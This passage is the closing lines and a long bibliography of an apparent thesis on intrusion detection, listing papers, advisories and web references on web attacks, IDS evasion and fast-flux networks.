reports. The idea is similar to that proposed in [Robertson et al. (2006)]
and, in particular [Bolzoni et al. (2009)].
We are currently working to address all these issues and further improve our
systems. On the other hand, we obtained promising results and further improvement
is the natural way of research.
Bibliography
[Admin (2002)] admin@cgisecurity.com (2002). The Cross Site Scripting FAQ,

Packet storm security ⇒ web link (accessed February 2010) 84
[Akritidis et al. (2005)] Akritidis, P., Markatos, E.P., Polychronakis, M., Anagnos-
takis, K. (2005). STRIDE: Polymorphic Sled Detection through Instruction Se-
quence Analysis. Security and Privacy in the Age of Ubiquitous Computing,
Springer, 181, 375-391. 118
[Aleph One] Aleph One. Smashing The Stack For Fun And Prot, Phrack 49, vol.
7, insecure.org ⇒ web link (accessed February 2010) 105
[Almuallim and Dietterich (1992)] Almuallim, H., Dietterich, T.G., (1992). E-
cient algorithms for identifying relevant features. Proceedings of the Ninth Cana-
dian Conference on Articial Intelligence, Vancouver, BC, Morgan Kaufmann,
38-45. 125
[Apache Vulnerabilities] The Apache Software Foundation. Apache httpd 2.0 vul-
nerabilities, ⇒ web link (accessed February 2010) 58
[Antichi et al. (2009)] Antichi, G., Ficara, D., Giordano, S., Procissi, G., Vitucci F.
(2009). Counting bloom lters for pattern matching and anti-evasion at the wire
speed. IEEE Network, 23(1), 30-35. 99
[Asimov (1956)] Asimov I. (1956). I, Robot, Signet, New York, NY, USA. 3
[Atlas] Atlas, Fast Flux Network Detection, Arbor Networks ⇒ web link (accessed
February 2010) 43
[Auger (2010)] Auger, R. (2010). Remote File Inclusion, The Web Application Se-
curity Consortium ⇒ web link (accessed February 2010) 84
[Axelsson (2000)] S. Axelsson (2000). The Base-Rate Fallacy and its Implications
for the Diculty of Intrusion Detection, In Proceedings of the 6th ACM Confer-
ence on Computer and Communications Security, pp. 1-7, November 1-4, 1999,
Kent Ridge Digital Labs, Singapore, ACM. 115
[Bajpai (2009)] Bajpai, G. (2009). HP OpenView NNM HTTP Accept-Language

header Buer Overow Vulnerability, iPolicy Networks Security Advisory ⇒ web
link (accessed February 2010) 84
[Barreno et al. (2006)] Barreno, M., Nelson, B., Sears, R., Joseph, A.D., Tygar,
J.D., (2006). Can machine learning be secure?, In Proceedings of the 2006 ACM
Symposium on Information, computer and communications security, ACM, pp.
16-25. 72, 110, 111, 112
142 Bibliography
[Basicevic et al. (2005)] Basicevic, I., Popovic, M., Kovacevic, V., (2005). The Use
of Distributed Network-Based IDS Systems In Detection of Evasion Attacks.
IEEE Proceedings of the Advanced Industrial Conference on Telecommunica-
tions Workshop, IEEE, pp. 78-82. 99
[Bass (2000)] Bass, T. (2000), Intrusion detection systems and multisensor data
fusion. ACM, 43(4), 99-105. 127
[Bellamy (2002)] Bellamy, W. (2002). HyperText Transfer Protocol (HTTP) Header

Exploitation, Advanced Incident Handling and Hacker Exploits, SANS GIAC
GCIH Practical Assignment v2.1 ⇒ web link (accessed January 2010) 84
[Ben-Asher (2009)] Ben-Asher, N., Meyer J., Möller, S., Englert R. (2009), An Ex-
perimental System for Studying the Tradeo between Usability and Security, In-
ternational Conference on Availability, Reliability and Security, IEEE Computer
Society, pp.882-887. 3
[Berners-Lee (1991)] Berners-Lee, T. (1991). WorldWideWeb - Executive Summary

⇒ web link (accessed January 2010) 9
[Bertoni et al. (2004)] Bertoni, A., Folgieri, R., Valentini, G., (2004). Feature selec-
tion combined with random subspace ensemble for gene expression based diagnosis
of malignancies. Biological and Articial Intelligence Environments, B.Apolloni,
M.Marinaro and R. Tagliaferri eds, Springer, 29?36. 108
[Bolzoni et al. (2007)] Bolzoni, D., Crispo, B., Etalle, S. (2007). ATLANTIDES:
An Architecture for Alert Verication in Network Intrusion Detection Systems.
Proceedings of the 21st Large Installation System Administration Conference,
USENIX Association, 141-152. 127, 134
[Bolzoni and Etalle (2008)] Bolzoni, D., Etalle, S. (2008). Boosting Web Intrusion
Detection Systems by Inferring Positive Signatures, In Proceedings of the OTM
2008 Confederated International Conferences, CoopIS, DOA, GADA, IS, and
ODBASE 2008. Part II on On the Move to Meaningful Internet Systems,
Springer-Verlag, pp. 938-955. 61
[Bolzoni et al. (2009)] Bolzoni, D., Etalle, S., Hartel, P.H. (2009). Panacea: Au-
tomating Attack Classication for Anomaly-Based Network Intrusion Detection
Systems, Recent Advances in Intrusion Detection (RAID), 12th International
Symposium, Lecture Notes in Computer Science, Springer. 64, 86, 139
[Borders et al. (2006)] Borders, K., Zhao, I., Prakash, A. (2006). Siren: Catching
Evasive Malware (Short Paper). Proceedings of the 2006 IEEE Symposium on
Security and Privacy, IEEE Computer Society, 78-85. 123
[Bradley (1997)] Bradley, A.P. (1997). The use of the area under the ROC curve in
the evaluation of machine learning algorithms, Pattern Recognition, vol. 30(7),
pp.1145-1159. 42
Bibliography 143
[Bright (2007)] Bright, A. (2007). Estonia accuses Russia of cyberattack , The

Christian Science Monitor ⇒ web link (accessed January 2010) 12
[Brisco (1995)] Brisco, T. (1995). DNS Support for Load Balancing, Network Work-
ing Group, RFC 1794 ⇒ web link (accessed January 2010) 22
[Breunig et al. (2000)] Breunig, M.M., Kriegel H., Ng, R.T., Sander, J. (2000).
LOF: Identifying Density-Based Local Outliers. Proceedings of the 2000 ACM
SIGMOD International Conference on Management of Data, ACM, 93-104. 73
[Brown (2003)] Brown, W., (2003). Evading Network Security Devices Utilizing Se-
cure Shell, SANS Security Essentials (GSEC) Practical Assignment ⇒ web link
(accessed December 2007). 96
[Butler and Hoglund (2004)] Butler J., Hoglund, G. (2004). VICE - Catch the hook-
ers. http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-butler/bh-us-
04-butler.pdf. Last access: August 2009. 101
[Byeong-Cheol et al. (2004)] Byeong-Cheol, C., Dong-il, S., Sung-Won, S., (2004).
Two-step Rule Estimation (TRE) - Intrusion Detection Method against evading
NIDS. Advanced Communication Technology Conference, IEEE, 1, 504-507. 118
[CAPEC (2007)] Common Attack Pattern Enumeration and Classication

(CAPEC)-86: Embedding Script (XSS) in HTTP Headers, MITRE Corpora-
tion, ⇒ web link (accessed February 2010) 84
[Casey (2004)] Casey, E. (2004). Digital Evidence and Computer Crime (Electronic
Version), Elsevier, San Diego, CA. 4
[Cenzic (2009)] Cenzic, Inc. (2009). Web Application Security Trends Report ⇒ web
link (accessed January 2010) 13
[CERT (1996)] CERT (1996). TCP SYN Flooding and IP Spoong Attacks, Advi-
sory CA-1996-21 ⇒ web link (accessed February 2010) 58
[CGI v.1.1 (2004)] Robinson, D., Coar, K. (2004). The Common Gateway Interface
(CGI) Version 1.1, The Internet Society. ⇒ web link (accessed December 2009).
10
[CGIsec] CGI Security, Parameter Manipulation attacks ⇒ web link (accessed

February 2010) 78
[Chen and Leneutre (2009)] Chen, L., Leneutre, J. (2009). A Game Theoretical
Framework on Intrusion Detection in Heterogenous Networks. IEEE Transac-
tions on Information Forensics & Security. 93
[CIDF] Staniford-Chen, S., Tung, B., Schnackenberg, D. (1998). The Common In-
trusion Detection Framework (CIDF). Appears in: Proceedings of the Informa-
tion Survivability Workshop, Orlando (USA) ⇒ web link (accessed February
2010) 4
144 Bibliography
[Cisco IPS] Cisco Systems Inc., Intrusion Prevention Systems Help Stop Threats ⇒
web link (accessed January 2010) 5, 102, 117, 129
[Cordasco and Wetzel (2009)] Cordasco, J., Wetzel, S. (2009). An attacker model
for MANET routing security. WiSec '09: Proceedings of the second ACM con-
ference on Wireless network security, ACM, pp. 87-94. 93
[Corona et al. (2008)] Corona, I., Giacinto, G., Roli, F., (2008). Intrusion Detection
in Computer Systems using Multiple Classifer Systems. In Supervised and Unsu-
pervised Ensemble Methods and Their Applications, O. Okun and G. Valentini
(eds), Springer-Verlag, Berlin/Heidelberg. 125
[Corona et al. (2009)] Corona, I., Giacinto, G., Mazzariello, C., Roli, F., Sansone,
C. (2009). Information fusion for computer security: State of the art and open
issues. Information Fusion, 10(4), pp. 274-284. 132
[Corona et al. (2009)] Corona, I., Ariu, D., Giacinto, G. (2009). HMM-Web: a
framework for the detection of attacks against Web applications, IEEE ICC 2009,
Dresden, Germany. 18, 63
[Cretu et al. (2008)] Cretu, G.F., Stavrou, A., Locasto, M.E., Stolfo, S.J.,
Keromytis, A.D. (2008). Casting out Demons: Sanitizing Training Data for
Anomaly Sensors. In the Proceedings of the IEEE Symposium on Security &
Privacy, Oakland, CA. 61, 72, 112
[CVE] Mitre Corporation (2010). Common Vulnerabilities and Exposures ⇒ web

link (accessed January 2010) 11, 65
[Debar and Wespi (2001)] Debar, H., Wespi, A., (2001). Aggregation and Correla-
tion of Intrusion-Detection Alerts. Recent Advances in Intrusion Detection Sym-
phosium, Springer-Verlag, 2212, 85-103. 127
[DNSBL] dnsbl.abuse.ch, Fast Flux Tracker ⇒ web link (accessed January 2010)
43, 48, 139
[Donaldson (2002)] Donaldson, M.E. (2002). Inside the Buer Overow Attack:
Mechanism, Method, & Prevention, SANS Institute InfoSec Reading Room,
SANS Whitepaper ⇒ web link (accessed January 2010) 84
[Duda et al. (2000)] Duda, R. O., Hart, P. E., Stork, D. G. (2000). Pattern Classi-
cation (2nd Edition), Wiley-Interscience. 108
[Dugad et al. (1998)] R. Dugad, R., Ahuja, N. (1998). Unsupervised multidimen-

sional hierarchical clustering, In Proceedings of the IEEE International Confer-
ence on Acoustics, Speech and Signal Processing. 35
[Ezeife et al. (2008)] Ezeife, C.I, Dong, J., Aggarwal, A.K. (2008). SensorWebIDS: a
web mining intrusion detection system, International Journal of Web Information
Systems, vol. 4(1), pp. 97-120. 61, 62
Bibliography 145
[Fogla and Lee (2006)] Fogla, P., Lee, W., (2006). Evading Network Anomaly De-
tection Systems: Formal Reasoning and Practical Techniques. Proceedings of the
13th ACM conference on Computer and communications security, pp. 59-68. 123
[FP (2005)] Agence France-Presse (2005). Hacker Attacks In US Linked To Chinese

Military: Researchers, Space War ⇒ web link (accessed January 2010) 12
[Franklin et al. (2007)] Franklin, J., Paxson, V., Perrig, A., Savage, S. (2007). An
inquiry into the nature and causes of the wealth of internet miscreants. In Pro-
ceedings of the 14th ACM conference on Computer and Communications Secu-
rity, (Alexandria, Virginia, USA, October 28 - 31, 2007). CCS '07. ACM, New
York, NY, 375-388. 12
[Gadaleta et al. (2009)] Gadaleta, F., Younan, Y., Jacobs, B., Joosen, W., De Neve,
E., Beosier, N. (2009). Instruction-level countermeasures against stack-based
buer overow attacks. Proceedings of the 1st EuroSys Workshop on Virtu-
alization Technology for Dependable Systems, ACM, 7-12. 103
[Garnkel and Rosenblum (2003)] Garnkel, T., Rosenblum, M. (2003). A Virtual

Machine Introspection Based Architecture for Intrusion Detection. Proceedings
of the Network and Distributed Systems Security Symposium (NDSS), 191-206.
103, 109
[Giacinto et al. (2003)] Giacinto, G., Roli, F., Didaci, L., (2003). Fusion of multiple
classiers for intrusion detection in computer networks. Pattern Recognition
Letters, 24(12), 1795-1803. 125
[Gorton and Champion (2003)] Gorton, A.S., Champion, T.G. (2003). Combining
Evasion Techniques to Avoid Network Intrusion Detection Systems. Skaion,
http://www.skaion.com/research/tgc-rsd-raid.pdf. Last access: 28 September
2007. 99
[Green et al. (2007)] Green, I., Raz, Z., Zviran, M. (2007). Analysis of active In-
trusion Prevention data for Predicting hostile activity in Computer Networks.
ACM, 50(4), 63-68. 130
[Guyet et al. (2009)] Guyet, T., Quiniou, R., Wang, W., Cordier, M. (2009). Self-
adaptive web intrusion detection system, The Computing Research Repository
(CoRR), ACM, vol. abs/0907.3819. 62
[Gyongyi et al. (2005)] Gyongyi, Z., Garcia-Molina, H. (2005). Web spam taxonomy,
In Proceedings of the First International Workshop on Adversarial Information
Retrieval on the Web 28
[Ollmann (2009)] Ollmann, G. (2009). Serial Variant Evasion Tactics: Techniques

Used to Automatically Bypass Antivirus Technologies, Damballa, Inc. ⇒ web
link (accessed January 2010) 16
146 Bibliography
[Ollmann (2008)] Ollmann, G. (2008). User-Agent Attacks, Whitepaper ⇒ web link

(accessed January 2010) 78
[Handley et al. (2001)] Handley, M., Paxson, V., Kreibich, C., (2001). Network In-
trusion Detection: Evasion, Trac Normalization, and End-to-End Protocol Se-
mantics. Proceedings of the 10th USENIX Security Symposium, USENIX Asso-
ciation, 10, 9-9. 99
[Hansen (2009)] Hansen, R. (2009). XSS (Cross Site Scripting) Cheat Sheet for lter
evasion, ha.ckers.org ⇒ web link (accessed January 2010) 16, 59, 84
[Harmer et al. (2002)] Harmer, P.K., Williams, P.D, Gunsch, G.H., Lamont, G.B.,
(2002). An articial immune system architecture for computer security applica-
tions, Appears in: IEEE Transactions on Evolutionary Computation, vol. 6(3),
pp. 252-280. 4
[Hedberg, S. (1996)] Hedberg, S., (1996). Combating computer viruses: IBM's new
computer immune system, Parallel & Distributed Technology: Systems & Ap-
plications, IEEE, vol. 4(2), pp. 9-11. 4
[Hernacki et al. (2005)] Hernacki, B., Bennett, J., Hoagland, J., (2005). An
overview of network evasion methods. Information Security Technical Report,
ELSEVIER, 10, 140-149. 96, 97, 98
[Heymann et al. (2007)] Heymann, P., Koutrika, G., Garcia-Molina, H. (2007).

Fighting Spam on Social Web Sites: A Survey of Approaches and Future Chal-
lenges, IEEE Internet Computing, IEEE Internet Computing, vol. 11(6), pp.
36-45 28
[Ho (1998)] Ho, T. K., (1998). The Random Subspace Method for Constructing De-
cision Forests. IEEE Transactions on Pattern Analysis and Machine Intelligence,
20(8), 832-844. 125
[Hofmann and Beaumont (2005)] Hofmann, M., Beaumont, L.R. (2005). Content
Networking: Architecture, Protocols, and Practice. Morgan Kaufmann Publisher.
22
[Hoglund and Butler (2006)] Hoglund, G., Butler, J. (2006). Rootkits-Subverting the
windows kernel. Addison-Wesley 101
[Holz et al. (2008)] Holz, T., Gorecki, C., Rieck, K., Freiling, F. (2008). Measur-
ing and Detecting Fast-Flux Service Networks, NDSS '08: Proceedings of the
Network & Distributed System Security Symposium 26, 27, 28
[Hu et al. (2009)] Hu, X., Knysz, M., Shin, K.G. (2009). RB-Seeker: Auto-detection
of Redirection Botnets, Annual Network & Distributed System Security Sympo-
sium (NDSS). 27
Bibliography 147
[IBM ISS IPS] IBM Internet Security Systems, Proventia Network Intrusion Pre-
vention System ⇒ web link (accessed January 2010) 5, 102, 117, 129
[IBM (2009)] IBM Internet Security Systems X-Force 2008 Trend & Risk Report.
⇒ web link (accessed December 2009). 12
[Ingham et al. (2007)] Ingham, K.L., Somayaji, A., Burge, J., Forrest, S. (2007).
Learning dfa representations of http for protecting web applications, Computer
Networks, vol. 51, pp. 1239-1255. 60, 63, 69
[IPv4] Network Sorcery, Inc. Internet Protocol version 4 ⇒ web link (accessed
February 2010) 97
[Jain et al. (1988)] Jain, A.K., Dubes, R.C. (1998). Algorithms for clustering data,
Prentice-Hall, Inc. 33, 35, 39
[Jain et al. (1999)] Jain, A.K., Murty, M.N., Flynn, P. J. (1999). Data clustering:
a review, ACM Computing Surveys, vol. 31(3), pp.264-323. 33, 39
[Johnson (2000)] Johnson, K. (2000). Maaboy trying to stare down prosecutors

Lawyer, USA Today. ⇒ web link (accessed December 2009). 10
[Jones (1998)] Jones, L. (1998). The Good Times email virus is a hoax! ⇒ web link
[Juniper (2002)] Juniper Networks (2002). HTTP: Apache WebDav PROPFIND Di-
rectory Disclosure ⇒ web link (accessed January 2010) 84
[K-159 (2009)] K-159 (2009). Joomla Hotel Booking System Component XSS/SQL
Injection Multiple Vulnerability, Milw0rm.com ⇒ web link (accessed January
2010) 58
[Kayacik et al. (2006)] Kayacik, H.G., Heywood, M., Zincir-Heywood, N., (2006).
On Evolving Buer Overow Attacks Using Genetic Programming. Proceedings
of the 8th annual conference on Genetic and evolutionary computation, ACM,
1667-1674. 117
[Kayacik et al. (2007)] Kayacik, H.G., Zincir-Heywood, A.N., Heywood, M.I.,

(2007). Automatically Evading IDS Using GP Authored Attacks. Proceedings
of the 2007 IEEE Symposium on Computational Intelligence in Security and
Defense Applications, IEEE, 153-160. 122
[Kearns and Ming (1988)] Kearns, M., Ming, Li (1988). Learning in the presence
of malicious errors. Proceedings of the twentieth annual ACM symposium on
Theory of computing, 267-280. 111
[Kehoe (1992)] Kehoe, B.P. (1992). Zen and the Art of the Internet: a Beginner's
Guide to the Internet, ⇒ web link (accessed January 2010) 9
148 Bibliography
[Kenney (1997)] Kenney, M. (1997). Ping of Death attack, insecure.org ⇒ web link
(accessed January 2010) 121
[Kuncheva (2004)] Kuncheva, L., Combining Pattern Classiers, Wiley. 64
[Kolesnikov and Lee (2004)] Kolesnikov, O., Lee, W. (2004). Advanced Polymorphic
Worms: Evading IDS by Blending in with Normal Trac, Technical Report,
Georgia Tech. ftp://ftp.cc.gatech.edu/pub/coc/tech_reports/2004/GIT-CC-04-
15.pdf. Last access: July 2009. 123
[Konte et al. (2009)] Konte M., Feamster, N., Jung, J. (2009). Dynamics of Online
Scam Hosting Infrastructure, PAM '09: Proc. Passive and Active Measurement
Conference 26, 27, 28, 37
[Kreibich and Crowcroft (2003)] Kreibich, C., Crowcroft, J., (2003). Honeycomb -
Creating intrusion detection signatures using honeypots. ACM SIGCOMM Com-
puter Communication Review, ACM, 34(1), 51-56. 105
[Kruegel et al. (2004)] Kruegel, C., Robertson, W., Vigna, G., (2004). Using Alert
Verication to Identify Successful Intrusion Attempts. Journal of Practice in
Information Processing and Communication (PIK), 27(4), 219-227. 126
[Kruegel et al. (2005) (a)] Kruegel et al., Vigna, G., Robertson, W. (2005). A multi-
model approach to the detection of web-based attacks. Computer Networks, 48(5),
717-738. 60, 61, 63, 70, 76, 89, 110, 122
[Kruegel et al. (2005) (b)] Kruegel, C., Valeur, V., Vigna, G., (2005). Intrusion De-
tection and Correlation: Challenges and Solutions. Advances in Information Se-
curity, Springer-Verlag TELOS. 127
[Krueger et al. (2010)] Krueger, T., Gehl, C., Rieck, K., Laskov, P. (2010). Tok-
Doc: A Self-Healing Web Application Firewall, In Proceedings of 25th ACM
Symposium on Applied Computing (SAC). 63, 64
[KYE (2007)] The Honeynet Project (2007). Know Your Enemy: Fast-Flux Service
Networks ⇒ web link (accessed January 2010) 25, 31
[Lancaster (2007)] Lancaster, T., (2007). IPv6 & IPv4 Threat Review with Dual-
Stack Considerations, 6journal, Whitepaper. 101
[Lam et al. (2004)] Lam, K., LeBlanc, D., Smith, B., (2004). Assessing Network
Security, Microsoft Press, One Microsoft Way, Redmond, Washington. 3
[Lau (2009)] Lau, K. (2009). Fake security tools still big threat, worms on rise, Com-
puterworld Canada, November 2009 ⇒ web link (accessed January 2010) 10
[Lee and Xiang (2001)] Lee, W., Xiang., D., (2001). Information-theoretic measures
for anomaly detection. IEEE Symposium on Security and Privacy, 130-143. 128
Bibliography 149
[Lee et al. (2005)] Lee, K., Chari, S., Shaikh, A., Sahu, S., Cheng, P. (2005). Pro-
tecting content distribution networks from denial of service attacks, In IEEE
International Conference on Communications, vol. 2, pp. 830-836. 58
[Lee et al. (2008)] Lee, W., Wang, C., Dagon D. Eds. (2008). Botnet Detection:
Countering the Largest Security Threat, Advances in Information Security, vol.
36, Springer. 11
[Lemos (2001)] Lemos, R. (2001). FBI hack raises global security concerns, CNET
News.com ⇒ web link (accessed December 2009). 4
[Likarish (2009)] Likarish, P., Jung, E. (2009). Leveraging Google SafeBrowsing to

Characterize Web-based Attacks, In ACM Conference on Computer and Com-
munications Security (CCS 2009), November 2009. 45
[Linhart et al. (2005)] Linhart, C., Klein, A., Heled, R., Orrin, S. (2005). HTTP
Request Smuggling, Watchre ⇒ web link (accessed January 2010). 84
[Lippman et al. (2000)] Lippmann, R., Haines, J., Fried, D., Korba, J., Das, K.
(2000). The 1999 darpa o-line intrusion detection evaluation, Computer Net-
works, vol. 34, pp. 579-595. 60
[Liu et al. (2005)] Liu, Z., Lin, W., Li, N., Lee, D. (2005). Detecting and ltering
instant messaging spam - a global and personalized approach, In Proceedings of
the 1st IEEE ICNP Workshop on Secure Network Protocols 28
[Lunt et al. (1992)] Lunt, T.F., Tamaru, A., Gilham, F., Jagannathan, R., Jalali,
C., Neumann, P.G., Javitz, H.S., Valdes, A., Garvey, T.D. (1992). A Real-time
Intrusion Detection Expert System (IDES), Final Technical Report, February
28, 1992, SRI International. 95
[Mac Vittie (2007)] Mac Vittie, L. (2007). SQL Injection Evasion Detection, F5
Whitepaper ⇒ web link (accessed January 2010) 16, 60, 84
[Mac Vittie (2010)] Mac Vittie, L. (2007). I am in your HTTP headers, attacking
your application, F5 Whitepaper ⇒ web link (accessed January 2010) 84
[Manion (2003)] Manion, A. (2003). Web servers enable HTTP TRACE method by
default, Vulnerability Note VU#867593, US-CERT ⇒ web link (accessed Jan-
uary 2010) 84
[Maslow (1943)] Maslow, A.H. (1943). A Theory of Human Motivation, Psycholog-

ical Review, vol. 50, pp. 370-396 ⇒ web link (accessed January 2010) 1
[Miller (2007)] Miller C. (2007). The legitimate vulnerability market: Inside the se-
cretive world of 0-day exploit sales. In Sixth Workshop on the Economics of
Information Security, Independent Security Evaluators ⇒ web link (accessed
January 2010) 11
150 Bibliography
[Mills (2009)] Mills, E. (2009). Botnet worm in DOS attacks could wipe data out on
infected PCs, CNET News ⇒ web link (accessed January 2010) 12
[milw0rm] milw0rm.com, ⇒ web link (accessed February 2010) 66, 68, 69
[Mishne et al. (2005)] Mishne, G., Carmel, D., Lempel, R. (2005). Blocking Blog
Spam with Language Model Disagreement, In Proceedings of the First Interna-
tional Workshop on Adversarial Information Retrieval on the Web 28
[Mitnick (2002)] Mitnick, K. (2002). The Art of Deception, Wiley Publishing Ltd:
Indianapolis, United States of America. 25
[Modsecurity] Breach security. Modsecurity web application rewall ⇒ web link (ac-
cessed January 2010) 60, 64
[Mutz et al. (2005)] Mutz, D., Kruegel, C., Robertson, W., Vigna, G., Kem-
merer, R.A., (2005). Reverse Engineering of Network Signatures. Proceedings of
the AusCERT Asia Pacic Information Technology Security Conference (Gold
Coast, Australia), University of Queensland. 58, 108, 117, 119
[Nazario et al. (2008)] Nazario J., Holz, T. (2008). As the net churns: Fast-ux
botnet observations, MALWARE '08: Proceedings of the 3rd International Con-
ference on Malicious and Unwanted Software 26, 27, 28
[NIST FIPS199 (2004)] National Institute of Standards and Technology (2004).

Standards for Security Categorization of Federal Information and Information
Systems, Federal Information Processing Standards Publication 199 ⇒ web link
[Newsome et al. (2005)] Newsome, J., Karp, B., Song, D., (2005). Polygraph: Au-
tomatically generating signatures for polymorphic worms. In Proceedings of the
IEEE Symposium on Security and Privacy, 226- 241. 105, 107
[Newsome et al. (2006)] Newsome, J., Karp, B., Song, D., (2006). Paragraph:
Thwarting Signature Learning by Training Maliciously. Recent Advances in In-
trusion Detection, Springer, 4219, 81-105. 105, 107
[Ng (2009)] Ng, V. (2010). New botnet spams links to sites hosted in Beijing and
Seoul, Search Security Asia ⇒ web link (accessed January 2010) 12
[Northcutt (1999)] Northcutt, S. (1999). Intrusion Detection FAQ: What was the
Melissa virus and what can we learn from it?, SANS Flash Report. ⇒ web link
[Northcutt and Novak (2001)] Northcutt, S., Novak J., (2001). Network Intrusion
Detection. New Riders Publishing, 201 West 103rd Street, Indianapolis. 100
[NTPpool] NTP pool project ⇒ web link (accessed January 2010) 40

Bibliography 151
[OASIS] OASIS, Overlay Anycast Service InfraStructure ⇒ web link (accessed Jan-
uary 2010). 40
[OWASP (2010)] Open Web Application Security Project (2010).The Ten most
Critical Web Application Security Risks (RC 2010) ⇒ web link (accessed Jan-
uary 2010) 15
[Page (1988)] Page, B. (1988). A report on the Internet Worm, University of Lowell,
Computer Science Department ⇒ web link (accessed January 2010) 9
[Passerini et al. (2008)] Passerini, E., Paleari, R., Martignoni, L., Bruschi, D.
(2008). FluXOR: Detecting and Monitoring Fast-Flux Service Networks, DIMVA
'08: Proceedings of the 5th international conference on Detection of Intrusions
and Malware, and Vulnerability Assessment 26, 27, 28, 36, 38
[Pastor (2009)] Pastor, A. (2009). CVE-2009-1151: phpMyAdmin Remote Code Ex-

ecution Proof of Concept, GNUCitizen ⇒ web link (accessed February 2010)
84
[Patton et al. (2001)] Patton, S., Yurcik, B., Doss, D., (2001). An Achilles' heel in
signature-based IDS: Squealing false positives in SNORT. Proceedings of RAID
2001 fourth International Symposium on Recent Advances in Intrusion Detec-
tion, Illinois State University. 120
[Paxson and Handley (1999)] Paxson, V., Handley, M. (1999). Defending Against
Network IDS Evasion. Proceedings of RAID 1999 International Symposium on
Recent Advances in Intrusion Detection. 99, 126
[PCI] PCI Security Standards Council. About the PCI Data Security Standard ⇒
web link (accessed January 2010) 15
[Perdisci et al. (2006) (a)] Perdisci, R., Dagon, D., Lee, W., Fogla, P., Sharif, M.,
(2006). Misleading Worm Signature Generators Using Deliberate Noise Injection.
Proceedings of the 2006 IEEE Symposium on Security and Privacy. 105, 107
[Perdisci et al. (2006) (b)] Perdisci, R., Gu, G., Lee, W. (2006). Using an ensemble
of one-class svm classiers to harden payload-based anomaly detection systems,
In Proceedings of the Sixth International Conference on Data Mining, IEEE
Computer Society, pp. 488-498. 64, 125, 128
[Perdisci, Corona et al. (2009)] Perdisci, R., Corona, I., Dagon, D., Lee, W. (2009).
Detecting Malicious Flux Service Networks through Passive Analysis of Recur-
sive DNS Traces, Annual Computer Security Applications Conference (ACSAC),
Honolulu, Hawaii, USA. 17
[Perks (2006)] Perks, M. (2006). Best practices for software development projects,
IBM Software Services for WebSphere, International Business Machines Corpo-
ration ⇒ web link (accessed December 2009). 2
152 Bibliography
[PHP IDS] PHP IDS, PHP-Intrusion Detection System ⇒ web link (accessed Jan-
uary 2010) 60
[Polychronakis et al. (2007)] Polychronakis, M., Anagnostakis, K.M., Markatos,

E.P. (2007). Network-Level Polymorphic Shellcode Detection Using Emulation,
In Journal in Computer Virology, 2(4), 257-274. 106
[Porras (2009)] Porras, P. (2009). Directions in Network-Based Security Monitoring.

IEEE Security and Privacy, 7(1), 82-85. 16
[Poulsen, K. (2001)] Poulsen, K. (2001). Lamo's Adventures in WorldCom, Securi-

tyFocus. web link (accessed December 2009). 10
[PSS (2002)] Packet Storm Security (2002). Apache 2.0 Cross-Site Scripting Vul-
nerability, ⇒ web link (accessed February 2010) 84
[Ptacek and Newsham (1998)] Ptacek, T., Newsham, T.N., (1998). Insertion, Eva-
sion, and Denial of Service: evading Network Intrusion Detection, Secure Net-
works Inc. ⇒ web link (accessed February 2010) 95, 96, 97
[Quinlan (1993)] , Quinlan, J.R. (1993). C4.5: Programs for Machine Learning,
Morgan Kaufmann Publishers. 38, 41
[Rabiner (1989)] Rabiner, L.R. (1989). A tutorial on hidden markov models and
selected applications in speech recognition, In Proceedings of the IEEE, vol. 77(2),
pp. 257-286. 67, 75
[Raven (1995)] Raven, F.H. (1995). Automatic Control Engineering, McGraw-Hill,

Inc., New York, NY, USA. 3
[RFC 792 (1981)] Network Working Group (1981). Internet Control Message Pro-
tocol, Internet Society ⇒ web link (accessed February 2010) 121
[RFC 2616 (1999)] Network Working Group (1999). Hypertext Transfer Protocol
HTTP/1.1, Internet Society ⇒ web link (accessed February 2010) 12, 65, 77, 80
[RFC 2818 (2000)] Network Working Group (2008). HTTP Over TLS, Internet So-
ciety ⇒ web link (accessed February 2010) 12, 96
[RFC 4252 (2006)] Network Working Group (2006). The Secure Shell (SSH) Proto-
col Architecture, Internet Society ⇒ web link (accessed February 2010) 96
[Riley et al. (2009)] Riley, R., Jiang, X., Xu, D. (2009). Multi-aspect proling of
kernel rootkit behavior. Proceedings of the fourth ACM european conference on
Computer systems, ACM, 47-60. 103
[Rolando (2006)] Rolando, M., Rossi, M., Sanarico, N., Mandrioli, D., (2006). A
formal approach to sensor placement and conguration in a network intrusion
detection system. Proceedings of the 2006 international workshop on Software
engineering for secure systems, ACM, 65-71. 100
Bibliography 153
[Robertson et al. (2006)] Robertson, W., Vigna, G., Kruegel, C., Kemmerer, R.
(2006). Using Generalization and Characterization Techniques in the Anomaly-
based Detection of Web Attacks, In Proceeding of the Network and Distributed
System Security Symposium (NDSS), San Diego, CA. 61, 64, 86, 139
[SAC (2008)] SSAC (2008), SAC 025 - SSAC Advisory on Fast Flux Hosting and
DNS ⇒ web link (accessed January 2010) 22, 25
[SANS (2009)] SANS Institute (2009). The Top Cyber Security Risks - september
2009. ⇒ web link (accessed January 2010) 10, 11, 14, 15
[SH (2010)] Spam Haus (2010). The World's Worst Spammers ⇒ web link (accessed
January 2010) 25
[Shafer (1986)] Shafer, G. (1986). A Mathematical Theory of Evidence, University

Press, Princeton. 62
[Shah (2004)] Shah, S. (2004). An Introduction to HTTP ngerprinting, Net square

[Shiels, M. (2010)] Shiels, M. (2010). Security experts say Google cyber-attack was
routine, BBC News, Silicon valley ⇒ web link (accessed January 2010) 12
[Shoch and Hupp (1982)] Shoch, J.F., Hupp J.A. (1982). The Worm Programs
Early Experience with a Distributed Computation, Communications of the ACM,
vol. 25(3), pp. 172-180. ⇒ web link (accessed January 2010) 9
[Snort] Sourcere. SNORT Open source network intrusion detection system, ⇒ web
link (accessed January 2010) 60, 104, 117
[Sourcere IPS] Sourcere, Inc., Intrusion Prevention System ⇒ web link (accessed
January 2010) 5
[Spett (2002)] Spett, K. (2002). SQL Injection: Are Your Web Applications Vulner-
able?, A White Paper from SPI Dynamics ⇒ web link (accessed January 2010)
58, 84
[L0t3k] L0t3k, SQL Injection: The Complete Documentation ⇒ web link (accessed
January 2010) 60, 84
[Stephenson and Sikdar (2006)] Stephenson, B., Sikdar, B., (2006). A Quasi-species
Approach for Modeling the Dynamics of Polymorphic Worms. 25th IEEE Inter-
national Conference on Computer Communications, INFOCOM. 118
[Symantec (2006)] Symantec (2006). HTTP Smuggle Get Content Length, attack
signature ⇒ web link (accessed January 2010) 84
[Symantec (2009)] Symantec Internet Security Threat Report Finds Malicious Ac-
tivity Continues to Grow at a Record Pace. ⇒ web link (accessed January 2010)
12
154 Bibliography
